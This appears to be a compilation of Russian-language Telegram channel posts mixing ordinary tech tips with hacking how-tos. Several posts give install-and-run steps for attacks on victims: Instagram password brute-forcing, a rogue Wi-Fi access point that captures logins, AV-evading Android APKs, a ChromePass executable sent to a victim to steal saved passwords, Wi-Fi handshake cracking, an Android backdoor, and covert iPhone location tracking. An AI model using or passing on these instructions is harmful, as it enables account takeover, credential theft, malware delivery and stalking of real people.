​​5 полезных дополнений в Chrome

В данном посте будет представлена подборка из достаточно полезных расширений для браузера Chrome, они упростят и сделают сёрфинг по сети ещё более приятным.

Survol - это расширение создано для того, чтобы Вы не переходили на сомнительные сайты, а могли просто наведя на ссылку увидеть превью страницы.

Funnel Search - упростит Вашу работу с поисковыми операторами Google. Составляет Google-дорки через довольно простой интерфейс.

Universal Bypass - обходит практически все сокращатели ссылок, перейдя по которым Вас могут заставить смотреть рекламу, а также противостоит сбору Ваших данных.

SponsorBlock - это очень полезное расширение, которое автоматически будет пропускать рекламные вставки на YouTube.

Picture-in-Picture Extension - позволит Вам смотреть любое видео в режиме "Картинка в Картинке"

​​Обмен файлами на Android устройствах

В новых версиях ОС Android пользователям стала доступна функция "Nearby Share". Она позволяет отправлять файлы на другие устройства, которые находятся поблизости от вас.

Для активации данной фичи пройдите по пути: "Настройки" - "Google" - "Подключения устройства", далее активируйте её, кликнув на соответствующий ползунок. Далее выделите нужный вам файл и отправьте его с помощью любого приложения, выбрал пункт "Обмен с окружением".

Для стабильной работы Nearby Share необходимо активировать Wi-Fi, Bluetooth и GPS (Одновременно). Также, если у вас возникла проблема с отсутствием пункта "Обмен с окружением", это означает, что ваш телефон ещё не поддерживает данную функцию.

​​P2P Чат в Termux

Одноранговая, децентрализованная, или пиринговая (P2P) сеть — оверлейная компьютерная сеть, основанная на равноправии участников. Данную сеть можно использовать для анонимность переписки, такой метод был реализован даже для Android устройств с помощью Termux.

Установка на оба устройства:
▫️apt install netcat

Инструкция для первого устройства:

Узнаём IP:
▫️ifconfig

Открываем порты (Рандомные 5 цифр):
▫️nc -l -p 12345

Второе устройство:

Подключение ко второму устройству:

Для этого первый пользователь должен прислать вам открытый порт и IP, а далее вы прописываете команду:
▫️nc "IP" 1234

Можно начинать переписку.

​​Переносим переписки из WhatsApp в Telegram

Война между WhatsApp и Telegram идёт полным ходом, но руководство первого мессенджера допустило огромнейшую ошибку в их недавнем обновлении Политики Конфиденциальности. Пользователи WhatsApp очень недовольны, как итог произошел тотальный обвал скачиваний: за неделю количество загрузок мессенджера упало на 2 миллиона.

Ну а Telegram приобрёл сотни тысяч новых пользователей, что очень порадовало Павла Дурова и в связи с этим он решил добавить опцию импорта чатов из других мессенджеров прямиком в Telegram.

1. Откройте любой групповой или личный чат в WhatsApp.
2. Перейдите в меню и выберите опцию "Экспорт чата".
3. После этого, в меню "Поделиться" выберите Telegram.

Будет запущен процесс импорта чатов, выбираем нужного нам человека и нажимаем на "Import".

​​Какие данные собирают о вас сайты?

Когда вы сидите и провите время за сёрфингом в интернете, о вас собирают данные множество сайтов, а вы об этом даже не подозреваете.

Blacklight поможет вам узнать, какие именно сайты собирают ваши данные. Данный сервис выявит не только сайты, но и какую именно технологию отслеживания они используют.

Перечень того, что может использовать сайт покажет вам сервис: использование рекламных трекеров, отпечатки браузера, отслеживание движений мыши, клики, сетевую активность.

▫️https://themarkup.org/blacklight

​Блокировка рекламы без расширений

Большинство расширений увеличивают нагрузку браузера на операционную систему, и чем их больше - тем медленнее работает браузер. Чтобы уменьшить нагрузку на браузер, можно найти альтернативы некоторым расширениям, например Adguard DNS.

Adguard специализируется на блокировке нежелательной рекламы, и в качестве альтернативы расширениям предлагает подключение через собственные DNS-сервера. Во время загрузки страницы DNS-сервер отсеивает запросы к трекерам и рекламным сервисам.

Главное преимущество этого подхода - ничего не нужно устанавливать. Вам достаточно указать DNS-сервера AdGuard в настройках подключения к сети, и вы получите защиту от рекламы для вашего компьютера или смартфона. Также DNS можно поменять в роутере, тогда защита распространится на всю локальную сеть.

Adguard DNS можно настроить на любой платформе. Подробную инструкцию для каждой из них вы можете найти здесь.

#security

Xiaomi запатентовала технологию обнаружения посторонних лиц

Согласно описанию патента для обнаружения нежелательных лиц в смартфон пользователя будет встроен специальный датчик, который сможет определить, что кто-то посторонний заглядывает в экран.

При обнаружении постороннего система либо предупредит пользователя, либо примет защитные меры самостоятельно, например, скрыв просматриваемое приложение.

#xiaomi

​​Взлом Instagram

Примерно год назад разработчики Instagram накосячили с очередным обновлением и дали возможность хакерам осуществлять взлом с помощью перебора паролей без каких-либо ограничений.

Из этого выходит, что Bruteforce всё ещё актуален, а для осуществления подобной атаки не нужны особые навыки и знания.

Установка:

Устанавливаем Termux

1. Скачиваем репозиторий GitHub:
git clone https://github.com/thelinuxchoice/instashell

2. Переходим:
cd instashell

3. Даём разрешение на запуск:
chmod +x instashell.sh

4. Запускаем TOR сервисы:
service tor start

5. Запуск
./instashell.sh

Готово. После запуска программы введите имя профиля жертвы в Instagram и путь к словарю с паролями.

​​OSINT разведка в Telegram

В данном посте пойдёт речь о достаточно полезном боте @TgScanRobot. Он позволит вам найти практически все публичные чаты в которых состоит цель.

Для поиска нужно переслать сообщение пользователя или же прислать Username/ID. Вам сразу будет выдан список всех публичных чатов в которых он состоит.

Данный бот на данный момент имеет в своей базе порядка 500 тыс. групп и информацию про 83-х миллионах активных юзеров. Минус в том, что за час можно выполнить максимум 10 запросов.

Также присутствует опция, которая предоставляет возможность самостоятельного добавления нового чата с помощью команды / add @groupname

▫️https://t.me/tgscanrobot

​​Точка доступа для перехвата данных

Зачастую люди попросту не хотят заботиться о безопасности своих данных, и подключаясь к "Халявному" Wi-Fi сильно рискуют отдать свои деньги в руки злоумышленника.

Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата:

1. Устанавливаем репозиторий GitHub:

- git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

2. Переходим в директорию утилиты:

- cd WiFi-Pumpkin

3. Даём права исполняющему файлу:

- chmod +x installer.sh

4. Установка всех компонентов:

- sudo ./installer.sh --install

5. Запуск:

- wifi-pumpkin

Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy".

​​Обходим антивирус на Android

Самые обычные юзеры ОС Android не подозревают об опасности софта, установленного из Play Market.

Даже в нем есть заражённое вирусами ПО, простой пример: в 2019 году компания Trend Micro нашла более 50-и подобных приложений.

Разработчики обходят защиту за счёт маскировки логики программы, это называют обфускацией. Данный способ можно использовать с помощью инструмента AVPass.

Установка:

- git clone https://github.com/sslab-gatech/avpass

- ./install-dep.sh

Использование:

- python gen_disguise.py -i <название файла> individual

Будет сгенерирован APK файл, который не будет детектится большинством антивирусов.

​​Сбрасываем пароль от Kali Linux

Kali Linux - это эталон безопасности и анонимности, его работа полностью направлена на обеспечение полной конфиденциальности пользователя в интернете. Но каждая система имеет свои изъяны.

Если получилось так, что вы забыли свой пароль, то могу с уверенностью сказать - вам не стоит быть хакером. Но если серьёзно, то первым делом нужно перезапустить систему и подождать, пока откроется GNU GRUB.

Нажимаем на "E", тем самым открыв конфиг GRUB.

Ищем строку "linux /boot/vmlinuz-3.18", в конце нее ставим пробел и вписываем "single init=/bin/bash". Жмем F10, чтобы все сохранилось.

Сразу откроется терминал, вводите команды по порядку:

- mount -rw -o remount /

- passwd root

Надо прописать 2 раза новый пароль, далее:

- shutdown -h now

Новый пароль был успешно устанвлен!

​​Получаем доступ к сохраненным паролям Chrome

ChromePass - это терминальная утилита, написанная на языке программирования Python, она способна "добывать" сохраненные пароли в Chrome.

Установка:

- git clone https://github.com/darkarp/chromepass.git

- cd chromepass

- pip install -r requirements.txt

- python -m pip install --upgrade pip

- python -m pip install -r requirements.txt

- python create_server.py

После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение.

Осталось подождать пока всё будет готово. После этого запускаем client.txt, а файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.

​​​​Как определить безопасность онлайн магазина

В интернете существует большое количество скама и порой бывает сложно сразу отличить невооруженным глазом тру от мошенников.

Для того, чтобы легче было определять, можно воспользоваться ресурсом SiteJabber. Данная платформа сделана специально для потребителей, которая помогает находить качественные сайта, а что самое важное избегать мошенников. Также этот сайт содержит информацию и про обычные сайты

Чтобы проверить рейтинг сайта, перейдите на sitejabber.com. Вставьте ссылку на сайт в единственное поле для ввода и нажмите "Search". После этого, вы увидите рейтинг сайта, последний отзыв и все отзывы пользователей.

▫️http://sitejabber.com/

​​Отслеживаем местоположение IPhone

В IOS-13 и более поздних версиях, присутствует такое приложение, как "Локатор", оно позволяет пользователю делится информацией о своем местоположении с друзьями и родными.

Сразу можно понять, что такой функционал можно использовать не только с согласия пользователя, но и для намеренного шпионажа.

1) Откройте "Локатор" на Iphone, который будете отслеживать, перейдите во вкладку "Люди".

2) Найдите пункт "Поделиться геопозицией" или "Начать делиться геопозицией", активируйте его.

3) Введите имя или свой номер телефона человека (отправьте приглашение себе).

4) И наконец, выберите вариант "Поделиться".

Как только местоположение будет передано на ваше устройство, не забудье отклчючить передачу своих геоданных.

​​​Как сделать интерфейс Android плавнее через меню разработчика

Если вы сталкиваетесь с подвисаниями интерфейса на своем Android-устройстве, то читайте этот пост до конца, ведь сейчас мы покажем, как можно решить эту проблему через специальное меню «Для разработчиков».

1. Откройте «Настройки» -> «О телефоне».
2. Начните быстро кликать по пункту «Номер сборки», пока не активируется меню.
3. Перейдите в «Система» -> «Дополнительно» -> «Для разработчиков».
4. Пролистайте вниз и активируйте функцию «Отключить аппаратное наложение». Параметр также может называться "GPU ускорение".
5. Перезагрузите смартфон.

Учтите, что названия и расположения настроек может отличаться в зависимости от прошивки устройства.

Активация этой функции задействует видеокарту смартфона для обработки графических элементов интерфейса, делая взаимодействия с устройством визуально плавнее.

#android

​​Фейк ROOT

Если вы уже давно находитесь в теме Termux и не имеете root права, то 100% сталкивались с проблемой, когда Вы не можете установить утилиту из-за их отсутствия. Но есть решение, эти самые права Администратора можно легко эмулировать с помощью одного инструмента.

Установка:

- apt update -y
- apt upgrade -y
- apt install git
- git clone https://github.com/B41B4L/FakeRoot
- FakeRoot
- chmod +x Root.sh

Использование:

- ./Root.sh — запуск утилиты

Готово, для проверки мы можем написать, команду:
- whoami
Результат должен быть такой - root

Так-же есть альтернативный способ установки:
- pkg install fakeroot

И чтобы активировать режим Рут мы всегда прописываем команду:
- fakeroot

Вот как-то так можно обмануть систему, но если есть возможность, то стоить всё-таки потратить какое-то кол-во времени и наконец-то поставить нормальные Рут права.

​​Взлом Wi-Fi - AirGeddon

Существует такая утилита, как AirCrack. Взлом Wi-Fi с её использованием осуществляется путём перехвата и последующей расшифровки handshake.

AirGeddon - это инструмент, следующего поколения, способный автоматизировать данную операцию.
Он позволит Вам перехватывать и расшифровывать handshake в считанные секунды.

Установка:

- git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
- cd airgeddon/

Использование:

- bash airgeddon.sh — запуск утилиты

Сразу после запуска перед вами появится главное меню утилиты.
Для перехвата handshake нужно перевести сетевую карту в режим монитора, для этого пропишите "2", а затем "5".

Далее выберите пункт "Explore for targets", когда увидите нужную цель, нажмите "Ctrl+C". Затем выберите "Capture Handshake" и введите "2", подтвердите перехват.

​​Боты для OSINT в Telegram

OSINT — разведывательная дисциплина, включающая в себя поиск, выбор и сбор разведывательной информации из общедоступных источников, а также её анализ.

▫️Глаз бога - позволяет осуществлять поиск по телефону, по фотографии, по социальных сетях, по имени, по BTC адресу, по аккаунту Telegram, по адресу проживания, по номеру авто и многое другое.

▫️Get Contact - бот, который повторяет функционал нашумевшего приложения GetContact

▫️ Egrul - ищет информацию о юридических и физических лицах, учредителях, связях, местах регистрации.

▫️ Last4mail - находит связь почтового адреса к одноклассникам и сбербанку.

▫️Telesint - данный бот выдаёт информацию о том, в каких чатах в Telegram сидит пользователь.

▫️ ibhldr - показывает предпочтения юзера на основе собранный информации по чатам, каналам и т.п.

​​BackDoor на Android

Бэкдор - дефект алгоритма, который намеренно встраивается в него разработчиком и позволяет получить несанкционированный доступ к данным или удалённому управлению операционной системой и компьютером в целом.

Основной целью бэкдора является скрытное и быстрое получение доступа к данным, в большинстве случаев - к зашифрованным и защищённым. Например, бэкдор может быть встроен в алгоритм шифрования для последующей прослушки защищённого канала злоумышленником

Установка:

- apt update && apt upgrade
- apt install git && apt install python2
- git clone https://github.com/PyRAT-svg/msfgaf.git
- cd msfgaf

Использование:

- python2 install.py

Далее, где выйдет "Next", жмём на "Enter", а где y/n кликаем y.

​Проводим поиск пароля Wi-Fi

В том случае, если Вы по какой-то нелепой ситуации забыли пароль от Wi-Fi, не стоит отчаиваться, у вас есть возможность его легко найти через командную строку Windows 10.

Инструкция:

1. Первым делом нам надо открыть командную строку, просто наберите в меню "Пуск" - "cmd", и откройте её от имени Администратора.

2. В открывшемся окне введите команду:
- netsh wlan show profiles

Эта команда используется для поиска имени профиля WiFi, от которого вы ищите пароль.

3. Далее введите следующую команду:
- netsh wlan show profile name=”WiFi Profile Name” key=clear

Замените "WiFi Profile Name" на имя нужного WiFi.

Вот и всё, пароль от WiFi будет виден в поле Key Content